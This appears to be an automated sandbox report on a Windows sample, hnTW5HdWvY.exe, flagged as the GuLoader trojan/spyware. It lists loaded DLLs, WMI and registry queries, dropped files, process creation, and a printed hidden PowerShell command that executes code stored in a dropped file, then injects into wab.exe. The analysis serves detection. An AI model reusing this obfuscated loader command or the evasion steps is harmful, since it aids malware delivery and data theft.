Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior

Source: hnTW5HdWvY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/20@6/4

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_004042A6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042A6

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Fonts

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File created: C:\Users\user\AppData\Local\Temp\nsy1948.tmp

Jump to behavior

Source: hnTW5HdWvY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hnTW5HdWvY.exe	ReversingLabs: Detection: 50%
Source: hnTW5HdWvY.exe	Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File read: C:\Users\user\Desktop\hnTW5HdWvY.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hnTW5HdWvY.exe "C:\Users\user\Desktop\hnTW5HdWvY.exe"
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File written: C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbC:4 source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2017911817.00000000081B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2017782713.0000000008175000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2015644677.000000000726A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071CB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"			Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EA5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0489AA6A pushad ; ret	1_2_0489AA71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_048910E7 push eax; retf 0070h	1_2_04891122
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04891127 push eax; retf 0070h	1_2_04891132
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04891137 push eax; retf 0070h	1_2_04891142
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CB00A9 push ss; ret	1_2_08CB00B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CB49D6 push edi; iretd	1_2_08CB49D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CBE9EA push 6D4A5B23h; retf	1_2_08CBE9F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CB498E push edi; iretd	1_2_08CB49D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CB0134 push ebx; ret	1_2_08CB013E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CB3F48 pushad ; ret	1_2_08CB3F49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08CBFF07 push 67AC2B90h; iretd	1_2_08CBFF13
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A70C95 push edi; ret	5_2_00A70CC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_042200A9 push ss; ret	5_2_042200B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_04220134 push ebx; ret	5_2_0422013E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_0422498E push edi; iretd	5_2_042249D5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_0422E9EA push 6D4A5B23h; retf	5_2_0422E9F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_042249D6 push edi; iretd	5_2_042249D5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_0422FF07 push 67AC2B90h; iretd	5_2_0422FF13
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_04223F48 pushad ; ret	5_2_04223F49

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File created: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe			Jump to dropped file

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.ini

Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
